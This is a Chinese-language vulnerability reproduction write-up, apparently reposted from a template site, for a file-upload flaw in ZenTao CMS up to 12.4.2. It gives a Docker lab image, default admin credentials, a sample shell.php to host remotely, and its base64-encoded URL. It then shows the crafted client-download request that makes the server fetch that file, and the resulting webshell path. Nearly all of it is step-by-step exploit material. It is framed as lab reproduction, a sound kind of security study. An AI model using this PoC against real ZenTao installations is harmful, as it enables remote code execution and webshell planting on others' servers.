一、漏洞概述
禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。
二、漏洞影响范围
禅道CMS<=12.4.2
三、环境搭建
docker-compose.yml
version: '3.2'
services:
web:
image: nudttan91/cnvd-c-2020-121325:normal
ports:
- 80:80
四、利用流程
1、登录
进入环境后如图所示:
用户名:admin
密码:123456
登录进来后正常重置密码
2、准备
(1)在服务器上准备相关的木马程序
shell.php
<?php echo "<?php phpinfo();?>";
打开apache或者nginx就可以,反正是从公网能够下载到shell.php这个的文件的方法都行
(2)对恶意文件地址进行base64编码
http://xxx.xxx.xxx.xxx/shell.php
aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=
3、利用poc远程下载文件
http://xxx.xxx.xxx.xxx/zentao/client-download-1-aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=-1.html
文章来源:https://www.toymoban.com/news/detail-672458.html
4、getshell
shell地址:http://xxx.xxx.xxx.xxx/zentao/data/client/1/shell.php
文章来源地址https://www.toymoban.com/news/detail-672458.html
到了这里,关于【CNVD/CVE】CNVD-C-2020-121325的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
